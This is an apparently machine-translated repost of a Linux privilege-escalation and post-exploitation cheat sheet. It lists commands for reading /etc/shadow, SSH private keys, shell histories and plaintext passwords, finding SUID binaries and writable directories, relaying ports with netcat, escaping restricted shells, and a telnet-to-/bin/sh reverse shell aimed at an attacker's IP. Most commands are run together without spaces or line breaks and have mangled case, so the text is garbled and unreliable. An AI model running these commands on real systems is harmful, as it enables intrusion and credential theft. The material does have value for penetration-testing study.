Access to sensitive information methods after the most complete Linux claim in history

Source: Internet
Author: User
Tags configuration settings prepare syslog cve mitre

Before starting this article, I would like to point out that I am not an expert. As far as I know, there is no "magical" answer in this vast area. Share, share (my starting point). here is a mix of commands to do the same thing, in different places, or just a different vision to see things. I know there's more "stuff" to look for. This is just a basic rough guide. Not every command, do a good job of attention to detail.

Each action in this article is a command that may not be available on your console because it may be a command that is used in other versions of Linux.

Enumerate key points

(Linux) is the right thing to do:

Collection – enumerations, enumerations, and some more enumerations. Process – Sort by data, analyze and prioritize priorities. Search – Know what to search for and where to find the vulnerability code. Adaptive – A custom vulnerability, so it fits. The work of each system is not "fixed" for every vulnerability. Try – Prepare, test and error.

System type

What is the system version?

Cat/etc/issuecat/etc/*-releasecat/etc/lsb-releasecat/etc/redhat-release

What is the kernel version of it?

Cat/proc/version Uname-auname-mrsrpm-q KERNELDMESG | grep Linuxls/boot | grep vmlinuz

What are some of its environment variables?

Cat/etc/profilecat/etc/bashrccat ~/.bash_profilecat ~/.bashrccat ~/.bash_logoutenvset

Do you have a printer?

Lpstat-a

Applications and Services

What services are running? What kind of service has user rights?

PS Auxps-eftopcat/etc/service

Which services have root permissions? In these services you look like those with loopholes and check again!

PS aux | grep Rootps-ef | grep root

What applications are installed? What version are they? What is currently running?

ls-alh/usr/bin/ls-alh/sbin/dpkg-lrpm-qals-alh/var/cache/apt/archivesols-alh/var/cache/yum/

Service settings, are there any error configurations? Are there any (fragile) plugins?

cat/etc/syslog.confcat/etc/chttp.confcat/etc/lighttpd.confcat/etc/cups/cupsd.confcat/etc/inetd.confcat/etc/ apache2/apache2.confcat/etc/my.confcat/etc/httpd/conf/httpd.confcat/opt/lampp/etc/httpd.confls-arl/etc/| awk ' $ ~/^.*r.*/

What are the work plans on the host?

crontab-lls-alh/var/spool/cronls-al/etc/| grep cronls-al/etc/cron*cat/etc/cron*cat/etc/at.allowcat/etc/at.denycat/etc/cron.allowcat/etc/cron.denycat/etc/ Crontabcat/etc/anacrontabcat/var/spool/cron/crontabs/root

What are the plain text user names and passwords that may be on the host?

Grep-i user [Filename]grep-i Pass [filename]grep-c 5 "Password" [Filename]find. -name "*.php"-print0 | xargs-0 grep-i-N "var $password" # Joomla

Communications and networking

NIC (s), what is the system? Which network is it connected to?

/sbin/ifconfig-acat/etc/network/interfacescat/etc/sysconfig/network

What are the network configuration settings? What kind of server is there in the network? DHCP server? DNS server? Gateway?

Cat/etc/resolv.confcat/etc/sysconfig/networkcat/etc/networksiptables-lhostnamednsdomainname

Other user hosts communicating with the system?

Lsof-ilsof-i: 80grep 80/etc/servicesnetstat-antupnetstat-antpxnetstat-tulpnchkconfig--listchkconfig--list | grep 3:ONLASTW

Cache? IP and/or MAC address?

Arp-eroute/sbin/route-nee

Can packets be sniffed? What do you see? Monitor traffic

# tcpdump TCP DST [IP] [port] and TCP DST [IP] [port]tcpdump TCP DST 192.168.1.7 and TCP DST 10.2.2.222 21

How do you get a shell? How do you interact with the system?

# HTTP://LANMASTER53.COM/2011/05/7-LINUX-SHELLS-USING-BUILT-IN-TOOLS/NC-LVP 4444 # attacker. Enter (command) NC-LVP 4445 # Attacker. Output (Result) telnet [atackers IP] 44444 | /bin/sh | [Local IP] 44445 # on the target system. Using the attacker's ip!

How to port forwarding? (Port redirection)

# rinetd

# Http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

# Fpipe

# fpipe.exe-l [Local Port]-R [Remote port]-s [local port] [local ip]fpipe.exe-l 80-r 80-s 80 192.168.1.7

#ssh

# SSH-[L/R] [local port]:[remote ip]:[remote Port] [local user]@[local ip]ssh-l 8080:127.0.0.1:80 [email protected] # Local portssh-r 8080:127.0.0.1:80 [email protected] # Remote Port

#mknod

# Mknod Backpipe p; NC-L-P [remote port] < Backpipe | NC [local IP] [local port] >backpipemknod backpipe p; Nc-l-P 8080 < Backpipe | NC 10.1.1.251 >backpipe # Port Relaymknod backpipe p; Nc-l-P 8080 0 & < Backpipe | Tee-a Inflow | NC localhost 80 | Tee-a Outflow 1>backpipe # Proxy (Port 8080)

Mknod

Backpipe p; Nc-l-P 8080 0 & < Backpipe | Tee-a Inflow | Nclocalhost 80 | Tee-a Outflow & 1>backpipe # Proxy Monitor (Port 8080)

Is it possible to build tunnels? Local, Remote Send command

ssh-d 127.0.0.1:9050-n [Username]@[ip]proxychains ifconfig

Secret Information and users

Who are you? Which ID is logged in? Who is already logged in? Who else is here? Who can do what?

idwhowlastcat/etc/passwd | cut-d: # List of Usersgrep-v-E "^#"/etc/passwd | Awk-f: & #039; $ = = 0 {print $} ' # List of Super Usersawk-f: ' ($ = = "0") {print}& #039; /ETC/PASSWD # List of Super Userscat/etc/sudoerssudo-l

What sensitive files can I find?

cat/etc/passwdcat/etc/groupcat/etc/shadowls-alh/var/mail/

What interesting files are in Home/directorie (S)? If you have permission to access

ls-ahlr/root/ls-ahlr/home/

Are there any passwords, scripts, databases, configuration files or log files? Password default path and location

Cat/var/apache2/config.inccat/var/lib/mysql/mysql/user. Mydcat/root/anaconda-ks.cfg

What have users done? Do you have any passwords? Did they edit anything?

Cat ~/.bash_historycat ~/.nano_historycat ~/.atftp_historycat ~/.mysql_historycat ~/.php_history

What kind of user information can be found

Cat ~/.bashrccat ~/.profilecat/var/mail/rootcat/var/spool/mail/root

Can private-key information be found?

Cat ~/.ssh/authorized_keyscat ~/.ssh/identity.pubcat ~/.ssh/identitycat ~/.ssh/id_rsa.pubcat ~/.ssh/id_rsacat ~/.ssh /id_dsa.pubcat ~/.ssh/id_dsacat/etc/ssh/ssh_configcat/etc/ssh/sshd_configcat/etc/ssh/ssh_host_dsa_key.pubcat/ Etc/ssh/ssh_host_dsa_keycat/etc/ssh/ssh_host_rsa_key.pubcat/etc/ssh/ssh_host_rsa_keycat/etc/ssh/ssh_host_ Key.pubcat/etc/ssh/ssh_host_key

File system

Which users can write configuration files in/etc/? Ability to reconfigure services?

ls-arl/etc/| awk ' $ ~/^.*w.*/' 2>/dev/null # anyonels-arl/etc/| awk ' $ ~/^. w/' 2>/dev/null # ownerls-arl/etc/| awk ' $ ~/^.....w/' 2>/dev/null # groupls-arl/etc/| awk '; $ ~/w.$/' 2>/dev/null # otherfind/etc/-readable-type F 2>/dev/null # any onefind/etc/-readable-type f-maxdepth 1 2>/dev/null # anyone

In/var/what can be found?

Ls-alh/var/logls-alh/var/maills-alh/var/spoolls-alh/var/spool/lpdls-alh/var/lib/pgsqlls-alh/var/lib/mysqlcat/ Var/lib/dhcp3/dhclient.leases

Any hidden configuration/files on the site? Configuration files and database information?

LS-ALHR/VAR/WWW/LS-ALHR/SRV/WWW/HTDOCS/LS-ALHR/USR/LOCAL/WWW/APACHE22/DATA/LS-ALHR/OPT/LAMPP/HTDOCS/LS-ALHR/ var/www/html/

What is in the log file? (what can help to "local file contains"?)

# http://www.thegeekstuff.com/2011/08/linux-var-log-files/cat /etc/httpd/logs/access_logcat / Etc/httpd/logs/access.logcat /etc/httpd/logs/error_logcat /etc/httpd/logs/error.logcat /var/log /apache2/access_logcat /var/log/apache2/access.logcat /var/log/apache2/error_logcat /var/log/ apache2/error.logcat /var/log/apache/access_logcat /var/log/apache/access.logcat /var/log/ Auth.logcat /var/log/chttp.logcat /var/log/cups/error_logcat /var/log/dpkg.logcat /var/log /faillogcat /var/log/httpd/access_logcat /var/log/httpd/access.logcat /var/log/httpd/error_ logcat /var/log/httpd/error.logcat /var/log/lastlogcat /var/log/lighttpd/access.logcat / var/log/lighttpd/error.logcat /var/log/lighttpd/lighttpd.access.logcat /var/log/lighttpd/ lighttpd.error.logcat /var/log/messagescat /var/log/securecat /var/log/syslogcat /var/log/ Wtmpcat /var/log/xferlogcat&nbsP;/var/log/yum.logcat /var/run/utmpcat /var/webmin/miniserv.logcat /var/www/logs/access_logcat  /var/www/logs/access.logls -alh /var/lib/dhcp3/ls -alh /var/log/postgresql/ls - alh /var/log/proftpd/ls -alh /var/log/samba/#

Auth.log, boot, btmp, Daemon.log, Debug, DMESG, Kern.log, Mail.info,

Mail.log, Mail.warn, messages, Syslog, Udev, wtmp (what's the file? Log. system boot ...)

If the command is limited, what can you do to break its limits?

Python-c ' Import pty;pty.spawn ("/bin/bash") ' Echo os.system ('/bin/bash ')/bin/sh-i

How do I install the file system?

Mountdf-h

Is there a mounted file system?

Cat/etc/fstab

What is advanced Linux file permissions to use? Sticky bits, SUID, and GUIDs

Find / -perm -1000 -type d 2>/dev/null    # sticky  bit - only the owner of the directory or the owner  of a file can delete or rename herefind / -perm -g=s  -type f 2>/dev/null    # SGID  (chmod 2000)  -  run as the  group, not the user who started it.find /  -perm -u=s -type f 2>/dev/null    # SUID  (chmod  4000)  - run as the  owner, not the user who  Started it.find / -perm -g=s -o -perm -u=s -type f 2>/dev /null    # sgid or suidfor i in  ' locate -r  "bin$" ; do find  $i &NBSP; ( -perm -4000 -o -perm -2000 )  -type f 2>/dev/null;  done     #Looks  in & #039;common& #039;  places: /bin, /sbin,  /usr/bin, /usr/sbin,/usr/local/bin, /usr/local/sbin and any other *bin,  for sgid or suid (Quicker search) #findstarting  at root  (/),  sgidorsuid, not symbolic links, only 3folders deep, list with  more detail and hideany errors  (e.g. permissiondenied) find/-perm -g= s-o-perm -4000! -type l-maxdepth 3 -exec ls -ld {} ;2>/dev/ Null

In which directories can the

be written and executed? Several "common" directories:/tmp directory,/var/tmp directory/dev/shm directory

find / -writable -type d 2>/dev/null         # world-writeable foldersfind / -perm -222 -type d 2>/dev/ Null      # world-writeable foldersfind / -perm -o+w  -type d 2>/dev/null    # world-writeable foldersfind /  -perm -o+x -type d 2>/dev/null    # world-executable  foldersfind /  ( -perm -o+w -perm -o+x )  -type d 2>/ dev/null   # world-writeable & executable foldersany  "Problem"  files? Writable, "not used" file find / -xdev -type d  ( -perm -0002 -a ! -perm  -1000 )  -print   # world-writeable filesfind /dir -xdev   (&NBSP;-NOUSER&NBsp;-o -nogroup )  -print   # noowner files 

Prepare and find exploit code

What development tools/languages/support are installed?

Find/-name Perl*find/-name python*find/-name gcc*find/-name cc

How do I upload a file?

Find/-name Wgetfind/-name nc*find/-name netcat*find/-name tftp*find/-name FTP

Find exploit code

Http://www.exploit-db.com

Http://1337day.com

Http://www.securiteam.com

Http://www.securityfocus.com

Http://www.exploitsearch.net

http://metasploit.com/modules/

Http://securityreason.com

Http://seclists.org/fulldisclosure/

http://www.google.com

Find more information about the vulnerability

Http://www.cvedetails.com

HTTP://PACKETSTORMSECURITY.ORG/FILES/CVE/[CVE]

HTTP://CVE.MITRE.ORG/CGI-BIN/CVENAME.CGI?NAME=[CVE]]HTTP://CVE.MITRE.ORG/CGI-BIN/CVENAME.CGI?NAME=[CVE]

HTTP://WWW.VULNVIEW.COM/CVE-DETAILS.PHP?CVENAME=[CVE]]HTTP://WWW.VULNVIEW.COM/CVE-DETAILS.PHP?CVENAME=[CVE]

http://www.91ri.org/

(FAST) "common" exploit, precompiled binary code files

http://tarantula.by.ru/localroot/

http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/

Is the information above difficult?

Go ahead and use a third-party script/tool to try it out!

How does the system hit the latest patches for the kernel, operating system, all applications, plugins and Web services?

Apt-get update && apt-get upgradeyum update

What are the minimum permissions required for the service to run?

For example, do you need to run MySQL as root?

Can I find a script that runs automatically from the following Web site?!

http://pentestmonkey.net/tools/unix-privesc-check/

http://labs.portcullis.co.uk/application/enum4linux/

Http://bastille-linux.sourceforge.net

(quick) Guide and links

For example

Http://www.0daysecurity.com/penetration-testing/enumeration.html

Http://www.microloft.co.uk/hacking/hacking3.htm

Other

Http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf

Http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf

Http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html

Access to sensitive information methods after the most complete Linux claim in history

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.